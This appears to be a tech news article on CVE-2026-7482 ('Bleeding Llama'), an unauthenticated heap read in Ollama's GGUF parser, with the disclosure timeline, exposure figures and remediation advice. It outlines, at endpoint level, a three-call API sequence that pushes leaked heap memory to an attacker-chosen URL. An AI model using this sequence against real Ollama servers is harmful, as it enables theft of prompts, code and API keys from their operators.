devtake.dev

A crafted Ollama model file leaks the whole server's memory. 300,000 instances are exposed.

Cyera disclosed CVE-2026-7482 on May 1, a CVSS 9.1 unauthenticated heap read in Ollama. Three API calls dump prompts, env vars, and API keys from any open instance.

Luca Reinhardt · · 4 min read · 2 sources
Cyera Research disclosure illustration for the Bleeding Llama vulnerability in Ollama's model execution pipeline
Image via Cyera Research · Source

Cyera Research published the Bleeding Llama disclosure on May 2 for CVE-2026-7482, a CVSS 9.1 unauthenticated heap read in Ollama’s quantization pipeline. Three API calls hand the attacker a copy of the running process’s memory: prompts, system prompts, environment variables, and whatever API keys the operator exported when they launched the binary.

The bug matters because of how Ollama ships by default. It binds to 0.0.0.0, has no built-in authentication, and the project’s quick-start instructions don’t warn against putting it on a public interface. Cyera says roughly 300,000 instances are reachable from the open internet. That is the install base running the GGUF-shaped attack surface this CVE describes.

What we know

Researcher Dor Attias of Cyera found the bug in Ollama’s GGUF parser. When the runtime loads a model, a quantization conversion function walks tensors using the shape field as its loop bound. If an attacker uploads a GGUF blob whose shape field claims a tensor is far bigger than the buffer actually holds, the loop reads past the allocation and into adjacent heap data. Attias writes that “if an attacker puts a very large number in the shape field, the loop will blindly read past the end of the buffer, that’s our out-of-bounds heap read.”

The exfiltration path uses three calls in sequence:

  • POST /api/blobs/sha256:[hash] stages the malicious GGUF blob.
  • POST /api/create registers a model whose name field doubles as the attacker’s destination URL.
  • POST /api/push ships the model to that URL, and the manifest the runtime serializes carries the leaked heap bytes along for the ride.

None of these endpoints require authentication. They are the same endpoints Ollama’s own CLI uses, so any internet-reachable instance accepts them by design.

Cyera’s disclosure timeline puts the report to Ollama on February 2, the upstream pull request on February 25, the CNA assignment by Echo on April 28, the CVE publication on May 1, and the public writeup on May 2. The patch is in the codebase, but Cyera says the disclosure landed without a CVE assignment for two and a half months, so a lot of operators upgraded without realizing what the changelog actually closed.

What an attacker pulls out depends on what’s resident in the process. Prompts and system prompts are obvious. Environment variables get loaded once at startup and sit in the heap for the life of the daemon, so OLLAMA_HOST, OPENAI_API_KEY, ANTHROPIC_API_KEY, and anything similar passed in via systemd unit or docker run -e are reachable. Cyera notes that for users running Ollama as a sidecar to a coding assistant, the leaked memory has also included pieces of proprietary code that the model had recently processed.

What we don’t know

Cyera’s writeup does not give a fixed-version number, only “upgrade to the latest release.” The PR landed in February but Ollama’s tagged releases between February and May contain several other changes, so operators are stuck reading the diff themselves. The project’s advisory archive on GitHub did not carry a CVE entry at publication time, which is why the bug went four months between commit and disclosure without showing up in vulnerability scanners.

The 300,000-server figure is Cyera’s Shodan-based scan. How many of those are still on a pre-February build is an open question. Hobbyist Ollama installs auto-update when the user remembers to run ollama pull, which is rarely. Enterprise sidecars pinned to a Docker image hash don’t update at all unless someone bumps the tag.

Source attribution

The technical breakdown and the exposure number come from Cyera Research, the firm that disclosed the bug. Echo is the CVE Numbering Authority that assigned the identifier. The Reddit r/netsec submission is where the disclosure first surfaced to a wider security audience.

What this means for you

If you run Ollama and it’s bound to anything other than 127.0.0.1, take it offline now. Reverse it to localhost, put it behind an authenticated reverse proxy, or firewall the port. The patch closes the OOB read, but everything that was in the heap before you upgraded was potentially exposed for the four months the bug sat in the wild.

Rotate API keys you handed to the daemon. OPENAI_API_KEY, Anthropic, Cohere, anything else you put in the environment that launched ollama serve. The leak primitive reads the entire address space, so assume those values walked. Ollama doesn’t redact env vars from its process memory because it has no reason to.

If you’re running Ollama as a developer sidecar inside a corporate network, treat this the same way you’d treat any unauthenticated localhost service that crossed the perimeter. The 0.0.0.0 default is the part that turns a parsing bug into a population-scale problem, and the project has not changed that default.

Share this article

Quick reference

CVSS
Common Vulnerability Scoring System, the 0 to 10 severity scale used by NVD; 7.0+ counts as High, 9.0+ Critical.
GGUF
A binary file format for storing quantized LLM weights, used by llama.cpp and Ollama. Tensor metadata sits in a header before the weight blob.

Sources

Mentioned in this article